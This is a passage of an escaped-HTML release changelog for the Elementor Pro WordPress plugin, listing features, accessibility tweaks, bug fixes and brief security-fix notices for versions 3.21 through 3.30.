sanitization in multiple widgets<\\/li>\\n<li>Fix: UI issue in Hotspot widget when Optimized Markup experiment is enabled<\\/li>\\n<li>Fix: Taxonomy filter not working in the Editor when Optimized Markup experiment is enabled<\\/li>\\n<\\/ul>\\n<h4>3.30.0 - 2025-07-01<\\/h4>\\n<ul>\\n<li>New: Introduced Full Website Templates in the Cloud - export, manage, and reuse full site kits across all your websites from one place<\\/li>\\n<li>Tweak: Activated "Optimized Markup" feature on new sites<\\/li>\\n<li>Tweak: Activated "Menu" feature on new sites<\\/li>\\n<li>Tweak: Improved error handling for Theme Builder display conditions<\\/li>\\n<li>Tweak: Added styling controls to Post Excerpt widget<\\/li>\\n<li>Tweak: Improved accessibility with <code>role<\\/code> and <code>aria-label<\\/code> attributes Post Navigation widget<\\/li>\\n<li>Tweak: Added <code>aria-label<\\/code> in Form widget<\\/li>\\n<li>Tweak: Added <code>aria-label<\\/code> in Login widget<\\/li>\\n<li>Tweak: Arranged content as lists in Portfolio and Posts widgets<\\/li>\\n<li>Tweak: Added Box Shadow and Text Shadow controls in Countdown widget<\\/li>\\n<li>Tweak: Moved image resolution control to content tab in Price List widget<\\/li>\\n<li>Tweak: Renamed and reorganized style sections in Price List widget<\\/li>\\n<li>Tweak: Added conditional logic to controls in Price Table widget<\\/li>\\n<li>Tweak: Grouped layout controls under list section in Price List widget<\\/li>\\n<li>Tweak: Updated minimum required WordPress version to 6.6<\\/li>\\n<li>Fix: Inline font icons support doesn\'t work in Post Navigation widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24367\\\">#24367<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18343\\\">#18343<\\/a>)<\\/li>\\n<li>Fix: Page Title condition doesn\'t work on child pages in Widget Display Conditions<\\/li>\\n<li>Fix: Editor users with "Access to edit content only" are able to delete elements<\\/li>\\n<li>Fix: Links are not crawlable in Video Playlist widget<\\/li>\\n<li>Fix: Uses hardcoded admin fonts in Video Playlist widget<\\/li>\\n<li>Fix: Editor freezes when the Form widget is used with a high PHP upload size limit<\\/li>\\n<li>Fix: Errors occur when Debug mode is enabled in Slides widget<\\/li>\\n<li>Fix: Plugin dependency not enforced in Elementor Pro<\\/li>\\n<li>Fix: Console shows deprecation warning in Global Widgets<\\/li>\\n<\\/ul>\\n<h4>3.29.2 - 2025-06-04<\\/h4>\\n<ul>\\n<li>Tweak: Added selectors to Menu widget for compatibility with Optimized Markup experiment<\\/li>\\n<\\/ul>\\n<h4>3.29.1 - 2025-05-28<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Animated Headline widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Price Table widget<\\/li>\\n<\\/ul>\\n<h4>3.29.0 - 2025-05-19<\\/h4>\\n<ul>\\n<li>New: Introduced Cloud Templates - save, manage, and reuse your templates across all your sites from a single cloud library<\\/li>\\n<li>Tweak: Improved accessibility with <code>role<\\/code> attributes in Share Buttons widget<\\/li>\\n<li>Tweak: Improved accessibility by grouping content with <code>role=region<\\/code> in the Video Playlist widget<\\/li>\\n<li>Fix: Focus color is not applied correctly for accessibility in WordPress Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24239\\\">#24239<\\/a>)<\\/li>\\n<li>Fix: Common scripts loaded late when using the Theme Builder<\\/li>\\n<\\/ul>\\n<h4>3.28.4 - 2025-05-05<\\/h4>\\n<ul>\\n<li>Fix: Empty results appeared on the frontend when using the Taxonomy Filter with the \'Avoid Duplicates\' option in Loop Grid widget<\\/li>\\n<li>Fix: Errors occur when Debug mode is enabled and the Optimized Markup experiment is active<\\/li>\\n<\\/ul>\\n<h4>3.28.3 - 2025-04-16<\\/h4>\\n<ul>\\n<li>Tweak: Improved sidebar navigation flow on the Elementor Home screen<\\/li>\\n<\\/ul>\\n<h4>3.28.2 - 2025-03-30<\\/h4>\\n<ul>\\n<li>Fix: Default Elementor animation shown for logged-out users when using an "External URL" source in Lottie widget<\\/li>\\n<\\/ul>\\n<h4>3.28.1 - 2025-03-23<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Animated Headline and Form widgets<\\/li>\\n<\\/ul>\\n<h4>3.28.0 - 2025-03-17<\\/h4>\\n<ul>\\n<li>Tweak: Ensured File Upload field styles are overridden by global styles in Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11651\\\">#11651<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17223\\\">#17223<\\/a>)<\\/li>\\n<li>Tweak: Updated Scroll Snap description to clarify incompatibility with animations and motion effects<\\/li>\\n<li>Tweak: Prevented special characters from being encoded in the email subject field in Form widget<\\/li>\\n<li>Tweak: Loaded module styles within the module instead of registering them in <code>plugin.php<\\/code><\\/li>\\n<li>Tweak: Updated minimum required WordPress version to 6.5<\\/li>\\n<li>Tweak: Improved keyboard accessibility for menus in Editor Top Bar<\\/li>\\n<li>Tweak: Made the edit button accessible in the Template widget<\\/li>\\n<li>Tweak: Optimized Form widget performance by caching field assets <code>using get_style_depends()<\\/code> and <code>get_script_depends()<\\/code> methods<\\/li>\\n<li>Tweak: Added Text Shadow control in Testimonial Carousel, Call to Action and Animated Headline widgets<\\/li>\\n<li>Fix: Button icon alignment breaks when Inline Font Icons feature is activated (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16077\\\">#16077<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16511\\\">#16511<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17692\\\">#17692<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17922\\\">#17922<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19253\\\">#19253<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19370\\\">#19370<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21236\\\">#21236<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21844\\\">#21844<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28080\\\">#28080<\\/a>)<\\/li>\\n<li>Fix: Dropdown caret color did not follow menu item color when Inline Font Icons feature is activated (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17500\\\">#17500<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18466\\\">#18466<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21664\\\">#21664<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24929\\\">#24929<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28064\\\">#28064<\\/a>)<\\/li>\\n<li>Fix: Page doesn\'t scroll up when a coupon error notice appears in Checkout widget<\\/li>\\n<\\/ul>\\n<h4>3.27.7 - 2025-03-13<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Lottie widget<\\/li>\\n<\\/ul>\\n<h4>3.27.6 - 2025-03-10<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Template Condition<\\/li>\\n<\\/ul>\\n<h4>3.27.5 - 2025-03-03<\\/h4>\\n<ul>\\n<li>Fix: The <code>wp_trigger_error<\\/code> function causes the site to crash instead of triggering a warning when used with ACF text<\\/li>\\n<\\/ul>\\n<h4>3.27.4 - 2025-02-16<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Screenshots module<\\/li>\\n<li>Security Fix: Improved code security enforcement in Query control<\\/li>\\n<li>Fix: ACF <code>true_false<\\/code> field causing a fatal error when used as a dynamic tag with third-party plugins (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/30170\\\">#30170<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.27.3 - 2025-02-06<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Stripe Button widget<\\/li>\\n<\\/ul>\\n<h4>3.27.2 - 2025-02-03<\\/h4>\\n<ul>\\n<li>Fix: Value type configuration issue causing errors when using ACF<\\/li>\\n<li>Fix: Hide content on responsive breakpoint option is not working on WordPress Menu widget when Optimized Markup experiment is activated<\\/li>\\n<\\/ul>\\n<h4>3.27.1 - 2025-01-27<\\/h4>\\n<ul>\\n<li>Tweak: Increased the number of items allowed in Dynamic Tags options in Display Conditions for Elements<\\/li>\\n<li>Security Fix: Improved code security enforcement in Global widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Lottie widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Admin settings<\\/li>\\n<li>Fix: Accessible navigation in popups caused unintended scrolling of the page when triggered (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/29175\\\">#29175<\\/a>)<\\/li>\\n<li>Fix: Empty custom fields are missing in the Dynamic Tags options in Display Conditions for Elements<\\/li>\\n<\\/ul>\\n<h4>3.27.0 - 2025-01-20<\\/h4>\\n<ul>\\n<li>Tweak: Removed the <code>elementor-widget-container<\\/code> div from the Menu, Loop, Table of Contents, Form, and Hotspot widgets as part of the Optimized Markup experiment to improve HTML structure<\\/li>\\n<li>Tweak: Reduced DOM size by optimizing the submit button markup in Search widget<\\/li>\\n<li>Tweak: Moved style loading to the head instead of the footer to improve CLS<\\/li>\\n<li>Tweak: Enabled conditional loading of Swiper.js based on widget dependencies to reduce unnecessary assets and improve page load times<\\/li>\\n<li>Tweak: Standardized navigation elements like arrows and bullets across all carousel and slider widgets for improved accessibility<\\/li>\\n<li>Tweak: Improved accessibility when the submit button has only an icon and no text in Search widget<\\/li>\\n<li>Tweak: Removed <code>load_plugin_textdomain()<\\/code> function from Elementor Pro<\\/li>\\n<\\/ul>\\n<h4>3.26.3 - 2025-01-07<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Search widget<\\/li>\\n<li>Fix: Height issues cause slideshow thumbnails to display incorrectly in Media Carousel (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/29663\\\">#29663<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.26.2 - 2024-12-22<\\/h4>\\n<ul>\\n<li>Fix: Menu items are not clickable in various scenarios in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/29191\\\">#29191<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.26.1 - 2024-12-17<\\/h4>\\n<ul>\\n<li>Fix: Restore deprecated <code>Plugin::enqueue_styles()<\\/code> function to avoid errors with 3rd party plugins<\\/li>\\n<\\/ul>\\n<h4>3.26.0 - 2024-12-16<\\/h4>\\n<ul>\\n<li>New: Introducing dynamic content support for Off-canvas in Loop Grid widget templates - enabling seamless display of additional content dynamically (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/29049\\\">#29049<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28935\\\">#28935<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7106\\\">#7106<\\/a>)<\\/li>\\n<li>New: AdBlock Detection trigger for Popups - display targeted popups for visitors using ad blockers<\\/li>\\n<li>New: Added Reload Page link action for Dynamic Tags<\\/li>\\n<li>Tweak: Added "Space Between Dots" control to Carousel widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2526\\\">#2526<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3277\\\">#3277<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21697\\\">#21697<\\/a>)<\\/li>\\n<li>Tweak: Replaced hidden <code>elementor-screen-only<\\/code> div with <code>aria-label<\\/code> attributes<\\/li>\\n<li>Tweak: Removed <code>elementor-widget-container<\\/code> div from Elementor widgets as part of the Optimized Markup experiment<\\/li>\\n<li>Tweak: Optimize popup styling by loading it only when necessary<\\/li>\\n<li>Tweak: Updated Gap between slides control to support only PX units in Carousel widget<\\/li>\\n<li>Tweak: Removed the dependency between the Tabs handler and the Menu handler<\\/li>\\n<li>Tweak: Added the ability to set <code>aria-label<\\/code> in Carousel widgets<\\/li>\\n<li>Tweak: Added <code>aria-roledescription=carousel<\\/code> to carousel wrapper<\\/li>\\n<li>Tweak: Added <code>aria-roledescription=slide<\\/code> to slide wrapper<\\/li>\\n<li>Tweak: Optimized carousel widgets markup as part of the Optimized Markup experiment<\\/li>\\n<li>Tweak: Updated minimum required Safari version to 15.5<\\/li>\\n<li>Tweak: Facebook widgets are no longer supported on mobile due to Facebook functionality changes<\\/li>\\n<li>Fix: Motion Effects sticky feature is not working when Scroll Snap is enabled<\\/li>\\n<li>Fix: Custom Image Resolution option is not working in Gallery widget<\\/li>\\n<li>Fix: \'Reading Settings\' unexpectedly reduces the number of posts displayed when using the Archive with Pagination setting<\\/li>\\n<li>Fix: Step Form does not scroll to the top when the first field is not an input field in Form widget<\\/li>\\n<li>Fix: Display Condition feature is available without an active Elementor license in Floating Elements<\\/li>\\n<li>Fix: Background options of Flip Box in Loop Grid widget are not working when images are added using ACF Dynamic Tags<\\/li>\\n<li>Fix: Dropdown icon in the Select field of the Form widget is cut off when the Inline Font Icons feature is activated<\\/li>\\n<li>Fix: Incompatibility between Form widget and WPML when using Nested Elements<\\/li>\\n<li>Fix: Performance issues when changing the title name in the Menu widget<\\/li>\\n<li>Fix: Warnings appear when Element Caching is set to Inactive in Carousel widgets<\\/li>\\n<li>Fix: Swiper styling missing from Lightbox inside Gallery widgets<\\/li>\\n<\\/ul>\\n<h4>3.25.5 - 2024-12-10<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Form widget<\\/li>\\n<li>Fix: Accessible navigation in popups caused unintended scrolling of the page when triggered (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/29175\\\">#29175<\\/a>)<\\/li>\\n<li>Fix: Popup overlay shown for non-logged users even when disabled<\\/li>\\n<\\/ul>\\n<h4>3.25.4 - 2024-11-20<\\/h4>\\n<ul>\\n<li>Tweak: Improved Global Widget loading method to enhance performance<\\/li>\\n<\\/ul>\\n<h4>3.25.3 - 2024-11-13<\\/h4>\\n<ul>\\n<li>Fix: Nested Elements are activated even when the Container experiment is inactive<\\/li>\\n<\\/ul>\\n<h4>3.25.2 - 2024-11-03<\\/h4>\\n<ul>\\n<li>Fix: Styling issues affecting popup layout when using a Dynamic Tag to open the popup<\\/li>\\n<li>Fix: Image captions are not displaying for non-logged-in users in Media Carousel widget<\\/li>\\n<li>Fix: Custom Add to Cart widget with Quantity enabled causes critical error (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/29159\\\">#29159<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.25.1 - 2024-10-31<\\/h4>\\n<ul>\\n<li>Fix: Multiple Custom Add to Cart widgets on the same page are adding the same product<\\/li>\\n<\\/ul>\\n<h4>3.25.0 - 2024-10-28<\\/h4>\\n<ul>\\n<li>Tweak: Added pagination functionality to the Live Results in Search widget<\\/li>\\n<li>Tweak: Added Anchor Offset control to allow precise positioning when scrolling to anchor links on the page<\\/li>\\n<li>Tweak: Load motion effects styles only when they are in use<\\/li>\\n<li>Tweak: Load sticky styles only when they are in use<\\/li>\\n<li>Tweak: Load popup styles only when they are in use<\\/li>\\n<li>Tweak: Load theme builder styles only when they are in use<\\/li>\\n<li>Tweak: Load transition styles for Call to Action and Gallery widgets only when they are in use<\\/li>\\n<li>Tweak: Load styles for Form widgets separately to enhance performance<\\/li>\\n<li>Tweak: Load styles for WooCommerce widgets separately to enhance performance<\\/li>\\n<li>Tweak: Load styles for Theme Elements widgets separately to enhance performance<\\/li>\\n<li>Tweak: Load styles for Carousel widgets separately to enhance performance<\\/li>\\n<li>Tweak: Load styles for Pricing widgets separately to enhance performance<\\/li>\\n<li>Tweak: Load styles for Floating Elements separately to enhance performance<\\/li>\\n<li>Tweak: Load styles for Link in Bio widgets separately to enhance performance<\\/li>\\n<li>Tweak: Load minified CSS in the Loop Builder\'s Call to Action button in the Editor<\\/li>\\n<li>Tweak: Removed "Payments" module styles<\\/li>\\n<li>Tweak: Removed <code>elementor-button-wrapper<\\/code> div from Payapl widget as part of the Optimized Markup experiment<\\/li>\\n<li>Tweak: Removed <code>elementor-button-wrapper<\\/code> div from Stripe widget as part of the Optimized Markup experiment<\\/li>\\n<li>Tweak: Merged "Form Submissions" feature into the version and moved it to the Advanced tab<\\/li>\\n<li>Tweak: Merged "Display Conditions" into the version<\\/li>\\n<li>Fix: Missing translation string for the empty message in the Table of Contents widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/27580\\\">#27580<\\/a>)<\\/li>\\n<li>Fix: Local Storage and Session Storage were being used even when popups were not in use (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7151\\\">#7151<\\/a>)<\\/li>\\n<li>Fix: Masonry layout is not working when pagination is set to "Load More" or "Infinite Scroll" in Loop Grid widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23684\\\">#23684<\\/a>)<\\/li>\\n<li>Fix: Extra gap between widgets on the frontend when using Off-canvas widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/27706\\\">#27706<\\/a>)<\\/li>\\n<li>Fix: Pagination and custom queries did not work when the Posts Widget was saved as a Global Widget or used via shortcode<\\/li>\\n<li>Fix: Lightbox videos are missing controls and displayed at the wrong size in Media Carousel widget<\\/li>\\n<li>Fix: Pagination options with Individual Pagination not working as expected in Posts and Loop Grid widgets<\\/li>\\n<li>Fix: Justified or Masonry layouts for the Pro Gallery would not display images on the frontend when inserted via nested tabs<\\/li>\\n<li>Fix: Error issue in the Loop Grid widget when used in theme parts with the Taxonomy Filter<\\/li>\\n<li>Fix: Removed the focus ring after clicking to open the Off Canvas inside the Editor<\\/li>\\n<li>Fix: Background gradient colors from the dynamic color tag values are not rendering on the frontend<\\/li>\\n<li>Fix: Excessive database requests generated by the Loop Grid widget<\\/li>\\n<li>Fix: Colors from Dynamic Tags were not rendered on the frontend<\\/li>\\n<li>Fix: Display issue in the Menu widget caused by the \'Native Intersection Observer API<\\/li>\\n<li>Fix: Dropdown area not working in certain scenarios in Menu widget<\\/li>\\n<li>Fix: Content Width control inside the Mega Menu is displaying an empty value<\\/li>\\n<\\/ul>\\n<h4>3.24.4 - 2024-10-09<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Media Carousel widget<\\/li>\\n<\\/ul>\\n<h4>3.24.3 - 2024-10-01<\\/h4>\\n<ul>\\n<li>Fix: Floating Elements template not loading when Single Page template is set with All Singular condition<\\/li>\\n<li>Fix: Form field styles not loading properly in various scenarios<\\/li>\\n<\\/ul>\\n<h4>3.24.2 - 2024-09-18<\\/h4>\\n<ul>\\n<li>Fix: Icons not displaying when Inline SVG Icons experiment is active in Link In Bio widgets and Floating Elements<\\/li>\\n<\\/ul>\\n<h4>3.24.1 - 2024-09-12<\\/h4>\\n<ul>\\n<li>Fix: Widget styles not loading correctly on front causing alignment inconsistencies (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28676\\\">#28676<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.24.0 - 2024-09-10<\\/h4>\\n<ul>\\n<li>New: Introducing support for Variable Fonts - allowing for more dynamic and flexible text styling (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6703\\\">#6703<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11333\\\">#11333<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19277\\\">#19277<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/25485\\\">#25485<\\/a>)<\\/li>\\n<li>Tweak: Added \'Structure\' indication for widgets with Display Conditions applied (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28027\\\">#28027<\\/a>)<\\/li>\\n<li>Tweak: Added a new option for setting the live search results width (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28280\\\">#28280<\\/a>)<\\/li>\\n<li>Tweak: Improved Honeypot field functionality in Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28480\\\">#28480<\\/a>)<\\/li>\\n<li>Tweak: Added options to \'Copy\', \'Paste\', and \'Clear\' Display Conditions in Context Menu<\\/li>\\n<li>Tweak: Improved performance of the Menu widget when using Dynamic Tags in the URL field<\\/li>\\n<li>Tweak: Improved performance when using Dynamic Tags in Nested Elements<\\/li>\\n<li>Tweak: Added the option for users to disable Akismet for specific Elementor forms<\\/li>\\n<li>Tweak: Adjusted URL structure when presenting the Search Archive page in Search widget<\\/li>\\n<li>Tweak: Added the \'Create Template\' button in Search widget<\\/li>\\n<li>Tweak: Added an option to enable the \'Loader\' animation while live results are loading in Search widget<\\/li>\\n<li>Tweak: Load share buttons compatibility styles only when they are in use<\\/li>\\n<li>Tweak: Load dialog styles only when they are in use<\\/li>\\n<li>Tweak: Load global widget styles only during Editor preview<\\/li>\\n<li>Tweak: Conditionally load widget styles only when the widgets are used<\\/li>\\n<li>Tweak: Load styles for CTA hover animations only when they are in use<\\/li>\\n<li>Tweak: Load notes styles only when the WordPress Toolbar is displayed<\\/li>\\n<li>Tweak: Split <code>animations.min.css<\\/code> into multiple CSS files and load them conditionally<\\/li>\\n<li>Tweak: Promoted Display Conditions feature to Stable status<\\/li>\\n<li>Tweak: Merged Taxonomy Filter feature into the version<\\/li>\\n<li>Tweak: Merged Search feature into the version<\\/li>\\n<li>Tweak: Added a note to \'Current Query\' explaining the impact of WordPress settings on pagination within Archives<\\/li>\\n<li>Tweak: Added the ability to set <code>aria-label<\\/code> for the Off-Canvas widget<\\/li>\\n<li>Fix: Manual Selection option is not excluding sticky posts in Posts and Loop Grid widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18689\\\">#18689<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23331\\\">#23331<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28179\\\">#28179<\\/a>)<\\/li>\\n<li>Fix: Template ID does not change according to the imported Loop Item (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21404\\\">#21404<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22202\\\">#22202<\\/a>)<\\/li>\\n<li>Fix: \'Editing Mode\' for the Off-canvas was not functioning correctly in certain scenarios<\\/li>\\n<li>Fix: Added definition to <code>clear_custom_image_sizes<\\/code> hook to prevent edge case issues<\\/li>\\n<li>Fix: Flickering issue with search result buttons when closing results using the keyboard escape key in Search widget<\\/li>\\n<li>Fix: Theme Style settings for buttons were overriding the text styling in Search widget<\\/li>\\n<li>Fix: Nesting menu inside another menu causes functionality issues in Menu widget<\\/li>\\n<li>Fix: Error when using array as custom fields value in Dynamic Tags<\\/li>\\n<\\/ul>\\n<h4>3.23.3 - 2024-08-05<\\/h4>\\n<ul>\\n<li>Fix: Dropdown area not working in certain scenarios in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28194\\\">#28194<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.23.2 - 2024-07-29<\\/h4>\\n<ul>\\n<li>Fix: Horizontal scroll bar appearing on the page when using Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28087\\\">#28087<\\/a>)<\\/li>\\n<li>Fix: Dropdown area disappearing in certain scenarios in Menu widget<\\/li>\\n<\\/ul>\\n<h4>3.23.1 - 2024-07-23<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in link URL<\\/li>\\n<\\/ul>\\n<h4>3.23.0 - 2024-07-15<\\/h4>\\n<ul>\\n<li>New: Search Widget with Live Results - Display live search results as visitors type into the search box, enhancing user experience and engagement (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/27664\\\">#27664<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24931\\\">#24931<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21459\\\">#21459<\\/a>)<\\/li>\\n<li>Tweak: Renamed <code>width<\\/code> to <code>Min width<\\/code> and added <code>Max width<\\/code> control to Hotspot tooltips (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18930\\\">#18930<\\/a>)<\\/li>\\n<li>Tweak: Applied a logical DOM order to the Mega Menu widget to improve accessibility<\\/li>\\n<li>Tweak: Added the ability to set <code>aria-label<\\/code> for WordPress Menu widget<\\/li>\\n<li>Tweak: Added the ability to set <code>aria-label<\\/code> for Menu widget<\\/li>\\n<li>Tweak: Added a bottom option to the Image Position control in Call to Action widget<\\/li>\\n<li>Fix: Missing version string in included CSS query string when Improved CSS Loading is enabled (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21879\\\">#21879<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23821\\\">#23821<\\/a>)<\\/li>\\n<li>Fix: Form submission icon message does not display correctly when Inline Font Icons feature is activated<\\/li>\\n<li>Fix: Save and Close button position issues in the conditions screen in Theme Builder.<\\/li>\\n<li>Fix: Focus appears on the first element when using the mouse to open Off-Canvas <\\/li>\\n<li>Fix: Links to Elementor Settings are broken in various locations<\\/li>\\n<li>Fix: Conditions field not showing all relevant conditions in Theme Builder<\\/li>\\n<li>Fix: Off-Canvas flickering in sticky containers with exit animations triggered by sticky effects<\\/li>\\n<\\/ul>\\n<h4>3.22.1 - 2024-06-24<\\/h4>\\n<ul>\\n<li>Fix: Styling of Global widgets not loading when Element Caching experiment is activated (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/27704\\\">#27704<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.22.0 - 2024-06-16<\\/h4>\\n<ul>\\n<li>New: Introducing Off-Canvas widget - create engaging and creative layers triggered by a link (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6225\\\">#6225<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21769\\\">#21769<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/25770\\\">#25770<\\/a>)<\\/li>\\n<li>Tweak: Added option to remove \'User IP\' and \'User Agent\' from the form submissions metadata (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14285\\\">#14285<\\/a>)<\\/li>\\n<li>Tweak: Replaced <code>waypoints.js<\\/code> library with the native Intersection Observer API<\\/li>\\n<li>Tweak: Extended Alignment and Position capabilities in Form widget<\\/li>\\n<li>Tweak: Moved icon View control to style tab in Flip Box widget<\\/li>\\n<li>Tweak: Moved icon View control to style tab in Call to Action widget<\\/li>\\n<li>Tweak: Optimized Form widget to eliminate unnecessary markup when the button icon is empty<\\/li>\\n<li>Tweak: Optimized Posts widget to eliminate unnecessary markup when Load More button text is empty<\\/li>\\n<li>Tweak: Remove <code>placeholder<\\/code> arguments from URL controls<\\/li>\\n<li>Tweak: Implemented CSS logical properties to Icon Position in Form, Posts and Menu Cart widgets<\\/li>\\n<li>Tweak: Activated Display Conditions feature for existing sites<\\/li>\\n<li>Tweak: Activated Taxonomy Filter feature for existing sites<\\/li>\\n<li>Tweak: Added functionality to delay the running of the ready triggers on inner elements<\\/li>\\n<li>Fix: Icons are now part of the link in the Menu Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24298\\\">#24298<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/25112\\\">#25112<\\/a>)<\\/li>\\n<li>Fix: <code>all: unset<\\/code> assigned to buttons cause focus issues (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24322\\\">#24322<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/25448\\\">#25448<\\/a>)<\\/li>\\n<li>Fix: Menu cart SVG icon disappears on front when Optimized Control Loading experiment is activated (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/27342\\\">#27342<\\/a>)<\\/li>\\n<li>Fix: Elementor Pro auto-updates are not working on multisite networks (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12615\\\">#12615<\\/a>)<\\/li>\\n<li>Fix: PHP error appears in the editor when using Loop Grid in an archive template<\\/li>\\n<li>Fix: UI glitch on Icon Position control in Paypal and Stripe Buttons widgets<\\/li>\\n<li>Fix: Icon Position control RTL issue in Hotspot widget<\\/li>\\n<li>Fix: Manual Selection "Include By" Query doesn\'t work with product categories<\\/li>\\n<\\/ul>\\n<h4>3.21.3 - 2024-05-20<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Loop Grid widget<\\/li>\\n<li>Fix: License expired affects the Display Conditions functionality in the front end<\\/li>\\n<\\/ul>\\n<h4>3.21.2 - 2024-04-30<\\/h4>\\n<ul>\\n<li>Fix: Special characters are not displayed correctly when using the Excerpt widget in Loop template (<a 